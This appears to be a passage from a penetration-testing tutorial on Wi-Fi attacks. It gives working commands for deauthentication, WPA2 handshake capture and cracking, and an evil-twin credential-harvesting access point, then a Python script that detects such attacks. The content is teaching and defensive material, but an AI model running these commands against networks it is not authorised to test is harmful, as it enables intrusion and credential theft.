Not all attacks are digital. Wireless attacks target the radio-frequency layer, while social engineering exploits human psychology. Both are powerful attack vectors and are commonly included in comprehensive penetration testing engagements — always with explicit authorisation.
Legal note: Intercepting wireless communications and conducting social engineering attacks without authorisation is illegal. These techniques require specific scope approval in the rules of engagement.
| Standard | Security Level | Status | Key Features |
|---|---|---|---|
| WEP | Very weak | Deprecated | Static keys, easily cracked |
| WPA | Weak | Deprecated | TKIP, still vulnerable |
| WPA2 | Moderate | Still common | AES/CCMP, vulnerable to KRACK |
| WPA3 | Strong | Current standard | SAE handshake, forward secrecy |
```bash
# Check if your adapter supports monitor mode
iwconfig
airmon-ng

# Enable monitor mode
sudo airmon-ng start wlan0

# Verify monitor mode
iwconfig wlan0mon

# Scan for nearby networks
sudo airodump-ng wlan0mon

# Target a specific network (capture handshake)
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
```
```text
BSSID              PWR  CH  ENC   AUTH  ESSID
AA:BB:CC:DD:EE:FF  -45   6  WPA2  PSK   TargetNetwork
11:22:33:44:55:66  -60  11  WPA2  PSK   OtherNetwork
```

- BSSID = Access point MAC address
- PWR = Signal strength in dBm (closer to zero = stronger signal, usually a closer AP)
- CH = Channel
- ENC = Encryption type
- AUTH = Authentication type
- ESSID = Network name
```bash
# Step 1: Capture the 4-way handshake
# Wait for a client to connect, OR force a deauthentication
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon
# -0 5 = send 5 deauth frames
# -a   = target AP BSSID
# -c   = target client MAC

# Step 2: Wait until "WPA handshake: AA:BB:CC:DD:EE:FF" appears in airodump-ng

# Step 3: Crack with aircrack-ng
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# Step 4: Or convert to hashcat format for GPU cracking
hcxpcapngtool -o hash.22000 capture-01.cap
hashcat -m 22000 hash.22000 /usr/share/wordlists/rockyou.txt
```
An evil twin is a rogue access point that impersonates a legitimate network:
```text
    Legitimate AP                 Evil Twin AP
 ┌──────────────┐              ┌──────────────┐
 │  "FreeWiFi"  │              │  "FreeWiFi"  │
 │    (real)    │              │  (attacker)  │
 └──────┬───────┘              └──────┬───────┘
        │                             │
        │        Victim device        │
        │       connects to stronger ─┘
        │       signal (attacker)
```
```bash
# Using hostapd-mana or wifiphisher
# 1. Create a rogue AP matching the target SSID
# 2. Optionally serve a captive portal to capture credentials
# 3. Forward traffic (MitM) or harvest data

# Example with wifiphisher
sudo wifiphisher -i wlan0 --essid "Company_WiFi" -p firmware-upgrade
```
Ethical note: Evil twin attacks must be explicitly authorised and are typically performed in a controlled environment.
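Both the deauthentication step and the evil twin pattern above leave signatures a wireless IDS can watch for. The script below is an added example, not code from the lesson or from any of the tools it names: it runs two small detections over constructed data shaped like the airodump-ng table, an allow-list check for unknown BSSIDs advertising a managed ESSID, and a sliding-window count of deauth frames per AP/client pair. The `ScanEntry` type, the `AUTHORISED` allow-list and the sample frames are all assumptions made for the example.

```python
from collections import defaultdict, namedtuple

# One row of an airodump-ng style scan: BSSID, PWR, CH, ENC, ESSID.
ScanEntry = namedtuple("ScanEntry", "bssid power channel enc essid")

# Constructed sample scan: the two rows from the lesson plus a hypothetical
# third AP reusing the managed ESSID from an unknown BSSID with no encryption.
SCAN = [
    ScanEntry("AA:BB:CC:DD:EE:FF", -45, 6, "WPA2", "TargetNetwork"),
    ScanEntry("11:22:33:44:55:66", -60, 11, "WPA2", "OtherNetwork"),
    ScanEntry("DE:AD:BE:EF:00:01", -30, 6, "OPN", "TargetNetwork"),
]
# Hypothetical allow-list: the BSSIDs your own APs legitimately use, per ESSID.
AUTHORISED = {"TargetNetwork": {"AA:BB:CC:DD:EE:FF"}}

def find_evil_twins(scan, authorised):
    """Entries advertising a managed ESSID from a BSSID not on the allow-list."""
    return [e for e in scan
            if e.essid in authorised and e.bssid.upper() not in authorised[e.essid]]

# Constructed deauth log: (timestamp_seconds, source_bssid, destination_client).
# The five frames at t=100 are what `aireplay-ng -0 5` looks like on the air;
# the lone frame at t=250 is the kind of isolated deauth a real AP may send.
DEAUTH_FRAMES = [(100.0 + 0.2 * i, "AA:BB:CC:DD:EE:FF", "CC:DD:EE:FF:00:11")
                 for i in range(5)]
DEAUTH_FRAMES.append((250.0, "11:22:33:44:55:66", "66:77:88:99:AA:BB"))

def deauth_bursts(frames, threshold=3, window=2.0):
    """(bssid, client) pairs with >= threshold deauth frames in any window-second span."""
    by_pair = defaultdict(list)
    for ts, bssid, client in frames:
        by_pair[(bssid, client)].append(ts)
    alerts = []
    for pair, times in by_pair.items():
        times.sort()
        start = 0
        for end in range(len(times)):  # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts.append(pair)
                break
    return alerts

if __name__ == "__main__":
    for e in find_evil_twins(SCAN, AUTHORISED):
        print(f"possible evil twin: {e.essid} from {e.bssid} (ch {e.channel}, {e.enc})")
    for bssid, client in deauth_bursts(DEAUTH_FRAMES):
        print(f"deauth burst: {bssid} -> {client}")
```

Management frame protection (802.11w, mandatory in WPA3) stops clients from honouring spoofed deauth frames, so the burst detector matters most on WPA2 networks that have not enabled it.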
Social engineering attacks exploit human behaviour rather than technical vulnerabilities.